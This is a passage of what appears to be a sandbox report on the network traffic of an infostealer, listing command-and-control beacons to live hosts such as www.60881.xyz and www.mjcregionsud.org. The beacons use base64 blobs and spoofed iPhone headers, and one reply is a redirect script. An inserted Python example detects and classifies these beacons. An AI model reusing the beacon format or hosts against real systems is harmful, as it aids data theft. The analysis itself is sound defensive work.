                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.60881.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.60881.xyz/ynjl/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 43 47 45 62 74 43 5a 71 55 30 53 4c 4d 66 43 2f 66 2b 6d 6c 70 6f 73 31 56 59 50 38 6b 50 34 76 6b 4b 34 54 67 77 31 50 4a 64 48 30 4c 30 41 57 72 57 72 69 31 7a 73 6d 30 49 59 59 43 56 59 64 39 63 32 37 4a 64 38 39 34 61 38 77 30 6e 62 58 6a 4c 65 4f 41 45 35 35 53 6b 47 76 70 72 62 43 59 65 38 4a 5a 2f 43 70 6d 51 54 6d 70 6e 50 2f 6e 7a 58 6d 57 76 64 37 7a 57 48 79 35 30 55 35 76 53 6d 34 66 55 54 6b 38 34 57 59 57 51 49 6b 4d 37 57 4c 6e 77 75 4d 4a 4e 74 4a 31 76 6f 50 77 30 61 44 2f 4e 65 35 6c 2f 46 46 4d 66 76 78 4d 72 61 2f 54 77 6f 54 30 36 62 36 51 51 4f 69 2b 51 3d 3d
                                                                                                                    Data Ascii: Qzj=CGEbtCZqU0SLMfC/f+mlpos1VYP8kP4vkK4Tgw1PJdH0L0AWrWri1zsm0IYYCVYd9c27Jd894a8w0nbXjLeOAE55SkGvprbCYe8JZ/CpmQTmpnP/nzXmWvd7zWHy50U5vSm4fUTk84WYWQIkM7WLnwuMJNtJ1voPw0aD/Ne5l/FFMfvxMra/TwoT06b6QQOi+Q==
Oct 24, 2024 05:08:03.629532099 CEST  557                IN         HTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
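The sessions above all have the same shape: a POST (or, in session 12, a GET) to a short path on a rotating host, one short form parameter carrying an opaque base64 blob, a Referer equal to Origin plus the path, and an iPhone Safari User-Agent sent by the Windows executable in the Process column; the hosts answer either 404 or, as www.60881.xyz does here, a 200 whose only content is a redirect script to a third-party site. The following Python is an added example, not part of the Joe Sandbox report and not FormBook's own code: it parses the requests transcribed from sessions 9 and 12 and the replies of sessions 9 and 13, pulls out the observable fields (host, path, parameter name, decoded blob size, declared versus actual body length), scores each request on those three shared traits, and tells a dead 404 decoy from a parked-domain redirect. The `BENIGN` request, the trait names, the 64-byte floor and the two-of-three threshold are assumptions of this example; the Accept headers and the 404 body are abbreviated in the samples. The blob is left opaque, since the report shows it only as base64 and decrypts nothing.

```python
"""Added example, not part of the Joe Sandbox report and not FormBook's code: parse
the beacons captured in sessions 9 and 12 above, score the traits they share, and
classify the replies from sessions 9 and 13. Samples are transcribed from the report
(Accept headers and the 404 body are abbreviated); the BENIGN request, the trait
names and the two-of-three threshold are assumptions. The blob stays opaque."""
import base64
import re

UA_IPHONE = ("Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 "
             "(KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4")
PROCESS = (r"C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm"
           r"\gNKNuXuipEBZec.exe")

SESSION_9 = (  # POST beacon with a 200-byte body
    "POST /2ncs/ HTTP/1.1\r\nHost: www.030002252.xyz\r\nAccept-Language: en-US,en;q=0.9\r\n"
    "Accept-Encoding: gzip, deflate\r\nOrigin: http://www.030002252.xyz\r\nConnection: close\r\n"
    "Cache-Control: no-cache\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 200\r\nReferer: http://www.030002252.xyz/2ncs/\r\n"
    "User-Agent: " + UA_IPHONE + "\r\n\r\n"
    "Qzj=P/ZYkjLBUYEvt8SERR5oe2q4tEO443vvU3ilg9PcUBu0+EYlbuhv6rlNkfMIvJIQIQ9VTII19PJjfTKJ"
    "LaY/iQgOElD4GvDZN3rIlnGgNs79WzFrL3pHs5GPW+lch75yiU0HdPA4MESXC6jiCqB900YnrloVnxPe"
    "OUrWl36Myce3VSkrFMH/ZsEU+f6RRcLANw==")
SESSION_12 = (  # GET beacon, blob in the query string
    "GET /2ncs/?Qzj=C9x4nV75ALRtqPK+aAR0NWmp5g6EqVqabxnIo4b2Z27N+E0QPuJF7pA8iv4PlagxECtfep"
    "EWwKhTDmrEQ68cs056FDzHHej7JHydzS2yCPPgbwEKPk9K7sk=&Znyl=2rnxDB HTTP/1.1\r\n"
    "Host: www.030002252.xyz\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n"
    "User-Agent: " + UA_IPHONE + "\r\n\r\n")
BENIGN = (  # constructed for contrast, not from the report
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nConnection: keep-alive\r\n\r\n")
RESPONSE_404 = (  # session 9 reply, body abbreviated
    "HTTP/1.1 404 Not Found\r\nConnection: close\r\ncontent-type: text/html\r\n"
    "content-length: 796\r\n\r\n<!DOCTYPE html>\n<html>...<h1>404</h1>...</html>")
RESPONSE_PARKED = (  # session 13 reply from www.60881.xyz, body as shown in the report
    'HTTP/1.0 200 OK\r\nConnection: close\r\nCache-Control: max-age=259200\r\n'
    'Content-Type: text/html;charset=utf-8\r\nContent-Length: 428\r\n\r\n'
    '<html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">'
    'var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname'
    '+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123")'
    '.click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);'
    'document.getElementById("hao123").dispatchEvent(e);}</script></body></html>')

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in lines[1:])}
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}

def split_form(data):
    """Split k=v&k=v WITHOUT URL-decoding: '+' and '/' inside the blob are base64
    characters, and urllib.parse.parse_qs would turn every '+' into a space."""
    return dict(item.partition("=")[::2] for item in data.split("&") if item)

def decoded_size(blob):
    """Byte length of the base64-decoded blob, or -1 if it is not valid base64."""
    try:
        return len(base64.b64decode(blob, validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        return -1

def extract_beacon(raw, process_path):
    """Observable fields of one request plus a score over three traits every beacon in
    this report shares; 'flagged' is a two-of-three rule (an assumption of this example)."""
    req = parse_request(raw)
    h = req["headers"]
    params = split_form(req["body"] if req["method"] == "POST" else req["query"])
    name, blob = next(iter(params.items()), ("", ""))
    size = decoded_size(blob)
    traits = {
        # a mobile Safari User-Agent sent by a Windows executable (the report's Process column)
        "mobile_ua_from_exe": "iPhone" in h.get("user-agent", "") and process_path.lower().endswith(".exe"),
        # at most two parameters, the first a short alphabetic name carrying >= 64 bytes of base64
        "opaque_param": 0 < len(params) <= 2 and len(name) <= 4 and name.isalpha() and size >= 64,
        # Referer is exactly Origin + path: the POST claims to come from the page it posts to
        "self_referer": req["method"] == "POST" and h.get("referer") == h.get("origin", "") + req["path"],
    }
    score = sum(traits.values())
    return {"method": req["method"], "host": h.get("host"), "path": req["path"], "param": name,
            "decoded_bytes": size, "body_bytes": len(req["body"].encode()),
            "declared_length": int(h.get("content-length", 0)), "traits": traits,
            "score": score, "flagged": score >= 2}

def classify_response(raw, request_host):
    """Separate a dead decoy (404) from a parked domain whose 200 page only redirects
    the visitor to a third-party host, as www.60881.xyz does in session 13 above."""
    head, _, body = raw.partition("\r\n\r\n")
    status = int(head.split(" ", 2)[1])
    if status == 404:
        return "not-found"
    hosts = {m.group(1) for m in re.finditer(r"https?://([\w.-]+)", body)}
    if status == 200 and "window.location" in body and hosts - {request_host}:
        return "parked-redirect"
    return "other"
```

Two points worth keeping when turning this into a real detection. The form splitter deliberately skips URL-decoding: `urllib.parse.parse_qs` would rewrite the `+` characters inside the blob as spaces and the base64 step would then fail on a request that is otherwise exactly this shape. And a 200 is not evidence of a live controller: the session 13 reply is a parked-domain page that only bounces the visitor to `http.gn301.com`, so the classifier treats it the same way as the 404 decoys rather than as a successful check-in. The 10300-byte POST of session 11 has the same three traits with a larger body; the score does not depend on size beyond the 64-byte floor.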


Session ID  Source IP    Source Port  Destination IP    Destination Port  PID   Process
14          192.168.2.4  50016        107.148.177.200   80                5568  C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 24, 2024 05:08:05.639368057 CEST  806                OUT        POST /ynjl/ HTTP/1.1
                                                                                                                    Host: www.60881.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.60881.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.60881.xyz/ynjl/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 43 47 45 62 74 43 5a 71 55 30 53 4c 4d 37 2b 2f 54 39 4f 6c 76 49 73 32 61 34 50 38 78 66 34 72 6b 4b 38 54 67 78 42 68 4a 72 2f 30 53 51 45 57 35 48 72 69 79 7a 73 6d 68 34 59 42 47 56 59 61 39 63 4c 45 4a 5a 38 39 34 62 59 77 30 6d 72 58 6a 36 65 4e 41 55 35 37 48 30 47 74 32 37 62 43 59 65 38 4a 5a 37 72 68 6d 51 4c 6d 70 55 58 2f 6d 58 37 70 4b 2f 64 34 6b 6d 48 79 75 6b 55 69 76 53 6d 61 66 57 32 4c 38 36 75 59 57 52 55 6b 4d 71 57 4d 77 41 76 46 57 64 73 43 78 4b 64 78 38 6c 37 7a 35 66 66 65 74 2f 4a 35 4a 5a 2b 72 64 61 37 6f 42 77 4d 67 70 39 53 4f 64 54 7a 72 6c 65 6b 75 63 65 77 42 68 59 67 4d 57 5a 62 53 35 53 4d 4d 4f 6c 77 3d
                                                                                                                    Data Ascii: Qzj=CGEbtCZqU0SLM7+/T9OlvIs2a4P8xf4rkK8TgxBhJr/0SQEW5Hriyzsmh4YBGVYa9cLEJZ894bYw0mrXj6eNAU57H0Gt27bCYe8JZ7rhmQLmpUX/mX7pK/d4kmHyukUivSmafW2L86uYWRUkMqWMwAvFWdsCxKdx8l7z5ffet/J5JZ+rda7oBwMgp9SOdTzrlekucewBhYgMWZbS5SMMOlw=
Oct 24, 2024 05:08:06.173131943 CEST | 557 | IN | HTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


Session ID: 15 | Source: 192.168.2.4:50017 | Destination: 107.148.177.200:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:08.192055941 CEST | 10888 | OUT | POST /ynjl/ HTTP/1.1
                                                                                                                    Host: www.60881.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.60881.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.60881.xyz/ynjl/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 43 47 45 62 74 43 5a 71 55 30 53 4c 4d 37 2b 2f 54 39 4f 6c 76 49 73 32 61 34 50 38 78 66 34 72 6b 4b 38 54 67 78 42 68 4a 6f 66 30 4f 7a 4d 57 72 31 44 69 7a 7a 73 6d 39 6f 59 63 47 56 5a 47 39 63 53 4e 4a 5a 34 48 34 5a 51 77 32 45 6a 58 79 5a 47 4e 54 30 35 37 46 30 47 75 70 72 62 62 59 66 4d 4e 5a 2f 33 68 6d 51 4c 6d 70 52 62 2f 79 7a 58 70 49 2f 64 37 7a 57 48 32 35 30 56 4e 76 53 2f 6e 66 57 79 68 2f 4b 4f 59 57 31 30 6b 4c 59 4f 4d 73 51 76 48 56 64 73 52 78 4b 5a 55 38 6c 32 4b 35 65 36 35 74 39 56 35 49 4e 58 51 5a 35 7a 4b 58 52 34 6a 74 73 6d 76 56 68 76 7a 6a 4a 30 4c 62 65 34 6a 6a 38 6b 6f 55 49 50 65 69 6e 5a 4c 55 41 70 56 78 4e 33 43 68 69 30 54 6f 4c 6a 4c 78 55 52 62 55 32 32 51 59 4f 4e 6c 36 4a 4c 4c 52 57 2b 68 31 46 47 76 6e 67 5a 4f 30 39 31 69 41 36 6e 73 6c 75 46 77 64 6a 65 47 31 31 75 6c 77 41 71 2f 37 57 30 6b 64 30 56 48 32 31 42 75 63 36 2f 66 6c 30 50 78 43 47 2b 44 58 56 4d 52 79 66 30 50 46 66 75 72 54 78 2b 34 55 59 65 4e 2b 4f 2b 35 4e 30 78 56 46 77 [TRUNCATED]
Data Ascii: Qzj=CGEbtCZqU0SLM7+/T9OlvIs2a4P8xf4rkK8TgxBhJof0OzMWr1Dizzsm9oYcGVZG9cSNJZ4H4ZQw2EjXyZGNT057F0GuprbbYfMNZ/3hmQLmpRb/yzXpI/d7zWH250VNvS/nfWyh/KOYW10kLYOMsQvHVdsRxKZU8l2K5e65t9V5INXQZ5zKXR4jtsmvVhvzjJ0Lbe4jj8koUIPeinZLUApVxN3Chi0ToLjLxURbU22QYONl6JLLRW+h1FGvngZO091iA6nsluFwdjeG11ulwAq/7W0kd0VH21Buc6/fl0PxCG+DXVMRyf0PFfurTx+4UYeN+O+5N0xVFw [TRUNCATED]
Oct 24, 2024 05:08:08.720948935 CEST | 557 | IN | HTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


Session ID: 16 | Source: 192.168.2.4:50018 | Destination: 107.148.177.200:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:10.731901884 CEST | 528 | OUT | GET /ynjl/?Qzj=PEs7u0VzI3DSA9TKYNWnz6gyWb/C39oE0a50vjpoFb3NQEkD5EPR31gJ3YEDEVY88OmbAto+098c/gTiopGLABAEMyjtpbfsUvV6UeXcuCjdlGHHhk6aRcY=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.60881.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:08:11.263966084 CEST | 557 | IN | HTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


Session ID: 17 | Source: 192.168.2.4:50019 | Destination: 91.212.26.5:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:16.843899965 CEST | 807 | OUT | POST /r61b/ HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.mjcregionsud.org
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.mjcregionsud.org/r61b/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 2b 41 67 62 64 6a 78 4c 64 61 71 53 34 63 52 6e 6a 42 74 54 4d 45 49 56 64 5a 65 55 6f 71 56 74 59 42 67 37 6f 45 58 4d 4f 6f 59 35 75 65 32 45 52 68 6f 47 30 7a 75 6c 55 41 65 35 78 4c 4e 79 31 7a 6b 33 51 75 57 56 57 6f 52 4e 4c 72 38 57 76 77 63 76 65 33 4f 4b 41 76 70 39 34 4e 59 66 56 6f 75 70 45 39 33 6a 35 30 71 5a 4d 61 4f 45 4f 6f 39 58 6f 36 6a 33 64 4f 54 70 6e 6c 67 74 73 53 35 4f 31 5a 67 5a 6a 73 4c 7a 55 65 77 42 75 34 74 2f 7a 4f 73 65 42 41 5a 36 52 75 72 57 44 41 30 4f 55 4b 52 71 4b 71 76 41 52 4d 4f 54 33 2b 41 68 4b 77 3d 3d
                                                                                                                    Data Ascii: Qzj=6oGhiNTWWXcP+AgbdjxLdaqS4cRnjBtTMEIVdZeUoqVtYBg7oEXMOoY5ue2ERhoG0zulUAe5xLNy1zk3QuWVWoRNLr8Wvwcve3OKAvp94NYfVoupE93j50qZMaOEOo9Xo6j3dOTpnlgtsS5O1ZgZjsLzUewBu4t/zOseBAZ6RurWDA0OUKRqKqvARMOT3+AhKw==
Oct 24, 2024 05:08:17.655010939 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:17 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 18 | Source: 192.168.2.4:50020 | Destination: 91.212.26.5:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:19.392584085 CEST | 827 | OUT | POST /r61b/ HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.mjcregionsud.org
                                                                                                                    Connection: close
